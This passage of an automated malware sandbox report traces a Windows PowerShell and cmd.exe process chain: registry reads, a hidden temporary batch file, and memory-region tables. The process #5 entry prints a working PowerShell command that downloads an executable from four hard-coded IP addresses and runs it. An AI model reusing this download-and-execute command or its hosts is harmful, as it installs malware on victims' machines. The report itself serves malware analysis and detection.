| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
4 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
5 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
5 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Registry | Read Value | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 |
Thread 0x9c4
39
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 |
Thread 0xa54
50
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = MshEnableTrace |
|
24 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp1971.bat, type = file_attributes |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp1971.bat, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp1971.bat, type = file_type |
|
2 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
8 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp1971.bat, size = 416 |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp1971.bat, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 |
Thread 0xa58
1
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Process | Create | process_name = C:\Users\aETAdzjz\AppData\Local\Temp\tmp1971.bat, show_window = SW_HIDE |
|
1 |
Process #4: cmd.exe
109
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd /c ""C:\Users\aETAdzjz\AppData\Local\Temp\tmp1971.bat" " |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:52, Reason: Child Process |
| Unmonitor | End Time: 00:01:45, Reason: Self Terminated |
| Monitor Duration | 00:00:53 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa60 |
| Parent PID | 0x9ac (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A64
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x0010ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x00797fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007a0000 | 0x007a0000 | 0x00920fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000930000 | 0x00930000 | 0x01d2ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001d30000 | 0x01d30000 | 0x02072fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x02080000 | 0x0234efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x49e60000 | 0x49eb8fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fef9100000 | 0x7fef9107fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Threads
Thread 0xa64
109
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = System Time, time = 2018-12-06 22:26:43 (UTC) |
|
1 | |
| System | Get Time | type = Ticks, time = 112804 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\cmd.exe, base_address = 0x49e60000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Environment | Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Environment | Get Environment String | name = KEYS |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\Desktop, type = file_attributes |
|
2 | |
| Environment | Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x77b323d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77b28290 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x77b317e0 |
|
1 | |
| File | Get Info | filename = "C:\Users\aETAdzjz\AppData\Local\Temp\tmp1971.bat", type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x7feff0e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x7feff0fe470 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x7feff0ff9b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x7feff0ff660 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp1971.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| File | Read | filename = STD_INPUT_HANDLE, size = 8191, size_out = 416 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_INPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Environment | Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 26 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 10 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 405 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Write | filename = STD_OUTPUT_HANDLE, size = 2 |
|
1 | |
| Process | Create | process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0xa80, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Environment | Set Environment String | name = COPYCMD |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Environment | Set Environment String | name = =ExitCodeAscii |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\tmp1971.bat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| File | Read | filename = STD_INPUT_HANDLE, size = 8191, size_out = 0 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_INPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| File | Read | filename = STD_INPUT_HANDLE, size = 8191, size_out = 0 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_INPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
2 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 |
Process #5: powershell.exe
478
63
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell "function fmoke([string] $sut1){$tig1=1;try{(new-object system.net.webclient).downloadfile($sut1,'C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe');}catch{$tig1=0;}return $tig1;}$mok1=@('193.187.172.11','46.173.218.240','193.187.172.42','46.173.218.83');foreach ($liu in $mok1){if(fmoke('http://'+$liu+'/uncle_sam.php') -eq 1){break;} } start-process 'C:\Users\aETAdzjz\AppData\Local\Temp\tmp6149.exe'; |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:52, Reason: Child Process |
| Unmonitor | End Time: 00:01:45, Reason: Self Terminated |
| Monitor Duration | 00:00:53 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa80 |
| Parent PID | 0xa60 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A84
0x
A8C
0x
A90
0x
A98
0x
AA0
0x
AA4
0x
AA8
0x
AAC
0x
AB0
0x
AB4
0x
86C
0x
874
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x000cffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x000d0000 | 0x00136fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00146fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00151fff | Pagefile Backed Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x00160000 | 0x00162fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00170fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00190fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x001e0000 | 0x001e3fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x001f0000 | 0x0020ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00210fff | Pagefile Backed Memory | rw |
|
|
|
- |
